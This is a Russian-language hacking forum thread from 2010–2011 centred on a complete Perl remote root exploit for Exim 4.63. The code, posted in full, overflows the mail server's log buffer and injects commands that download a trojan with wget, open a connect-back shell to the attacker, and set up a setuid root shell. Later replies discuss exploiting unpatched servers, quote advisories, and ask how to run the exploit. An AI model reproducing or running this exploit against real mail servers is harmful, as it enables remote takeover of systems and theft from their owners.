Старый 12.12.2010, 17:07   #1
che
 
Аватар для che
 
Регистрация: 05.07.2010
Сообщений: 144
Репутация: 166
По умолчанию Exim 4.63 Remote Exploit

http://www.exploit-db.com/exploits/15725/

Код:
#Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module
 
=for comment
 
use this connect back shell as "trojanurl" and be sure to setup a netcat,
 
---snip---
 
$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
 
open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
};
close FILE;
 
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
 
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);
 
---snip---
 
=cut
 
use IO::Socket;
 
if ($#ARGV ne 3) {
        print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n";
        print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n";
        exit;
}
 
$|=1;
 
$trojan = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$helohost = "abcde.com";
 
$max_msg = 52428800;
 
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "25",
                                 Proto    => 'tcp');
 
while(<$sock>) {
        print;
        if ($_ =~ /220 /) { last;}
}
 
print $sock "EHLO $helohost\r\n";
while(<$sock>) {
        print;
        if ($_ =~ /250-SIZE (\d+)/) {
                $max_msg = $1;
                print "Set size to $max_msg !\n";
        }
        if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) {
                $revdns = $1;
                $saddr = $2;
        }
        if ($_ =~ /250 /) { last;}
}
 
if ($revdns eq $helohost) {
        $vv = "";
} else {
        $vv = $revdns. " ";
}
 
$vv .= "(" . $helohost . ")";
 
$from = "root\@local.com";
$to = "postmaster\@localhost";
 
$msg_len = $max_msg + 1024*256;
$logbuffer_size = 8192;
 
$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";
$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";
 
$filler = "V" x (8 * 16);
$logbuffer_size -= 3;
 
for ($k=0;$k<60;$k++) {
if (length($logbuffer) >= $logbuffer_size) {last;}
$hdr = sprintf("Header%04d: %s\n", $k, $filler);
$newlen = length($logbuffer) + length($hdr);
if ($newlen > $logbuffer_size) {
        $newlen -= $logbuffer_size;
        $off = length($hdr) - $newlen - 2 - 1;
        $hdr = substr($hdr, 0, $off);
        $hdr .= "\n";
}
$hdrs .= $hdr;
$logbuffer .= "  " . $hdr;
}
 
$hdrx = "HeaderX: ";
$k2 = 3;
for ($k=1;$k<=200;$k++) {
        if ($k2 > 12) {
                $k2 = 3;
        }
#        $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} ";
        $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} ";
        $k2++;
}
 
$v = "A" x 255 . "\n";
$body = "";
while (length($body) < $msg_len) {
        $body .= $v;
}
 
$body = substr($body, 0, $msg_len);
 
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
$v = <$sock>;
print $v;
print $sock "DATA\r\n";
$v = <$sock>;
print $v;
 
print "Sending large buffer, please wait...\n";
 
print $sock $hdrs;
print $sock $hdrx . "\n";
print $sock $body;
print $sock "\r\n.\r\n";
$v = <$sock>;
print $v;
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
 
while(1){};
кто нибудь проверял?
che вне форума   Ответить с цитированием
Старый 15.12.2010, 18:00   #2
Acez666
 
Аватар для Acez666
 
Регистрация: 13.12.2010
Сообщений: 10
Репутация: 1
По умолчанию

не могу найти сервы пока.
Acez666 вне форума   Ответить с цитированием
Старый 24.12.2010, 23:25   #3
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию

Пришло рсс секлаба.
http://www.securitylab.ru/vulnerability/394471.php
http://www.securitylab.ru/vulnerability/403637.php

Нагуглил пару интересных линков

http://www.theregister.co.uk/2010/12...ecution_peril/
http://www.exim.org/lurker/message/2...32d4f2.en.html

Баг в данный момент активно эксплуатируют. Пока, почти везде стоят бажные версии Exima, судя по новостям. Надо потестить
asddas вне форума   Ответить с цитированием
Старый 24.12.2010, 23:59   #4
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

незнаю что и сказать..поздно уже эксплуатировать))с 11 декабря юзается.
snake вне форума   Ответить с цитированием
Старый 25.12.2010, 01:58   #5
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию

Цитата:
Сообщение от snake Посмотреть сообщение
незнаю что и сказать..поздно уже эксплуатировать))с 11 декабря юзается.
ты это, к чему вообще? ты хоть читал то что находится по линкам?
а эксплуатировать никогда не поздно, главное знать где

Цитата:
Сообщение от http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html
While investigating security break in the network of my company, I've
captured (by tcpdump) sequence of successful remote root attack through
Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
didn't find email of current maintainer of Exim, so I've decided to
write to this mailing lists.

...

I haven't reproduced remote part of attack, but escalation from Debian-exim to
root works also at exim4-daemon-light 4.72-2 from Debian Squeeze.
Цитата:
Сообщение от http://www.theregister.co.uk/2010/12/11/exim_code_execution_peril/
...
The vulnerability was patched in 2008, in version 4.7. But the fix was never identified as a security patch so it was never applied to older versions, which are still in wide use. The bug is exploited by sending vulnerable systems a message with maliciously crafted headers and a 50MB payload. When it gets rejected for being too large and logged, the headers exploit a buffer overflow bug.
...
Цитата:
Сообщение от www.securitylab.ru
Множественные уязвимости в Exim
...
Программа: Exim версии до 4.72
Опасность: Высокая
...
Множественные уязвимости в Exim в CPanel
...
Программа: CPanel 11.x
Опасность: Критическая

Последний раз редактировалось asddas; 25.12.2010 в 02:12..
asddas вне форума   Ответить с цитированием
Старый 23.05.2011, 18:14   #6
Magvegva
 
Регистрация: 23.05.2011
Сообщений: 1
Репутация: 0
Question

Цитата:
Сообщение от asddas Посмотреть сообщение
ты это, к чему вообще? ты хоть читал то что находится по линкам?
а эксплуатировать никогда не поздно, главное знать где
Hi2All!
Я вот, точно знаю где эксплуатировать, более того, пару серверов уже хакнули и, я так думаю что именно через exim. Вопрос: кто-то пробовал unix/smtp/exim4_string_format из Metasploit 3.7? Я пробовал даже дома ставить exim 4.66, но експлойт не проходит. У кого-то есть тарболл с 100% уязвимой версией? Мне надо провести опыт по взлому екзима на своём же сервере, а не выходит
Magvegva вне форума   Ответить с цитированием
Старый 13.06.2011, 13:43   #7
Xenu
 
Регистрация: 05.07.2010
Сообщений: 6
Репутация: 0
По умолчанию

Цитата:
Сообщение от che Посмотреть сообщение
http://www.exploit-db.com/exploits/15725/

<cut>

кто нибудь проверял?
Прошу прощения, не совсем понял как это использовать
Подскажите, пожалуйста
Xenu вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра
Комбинированный вид Комбинированный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot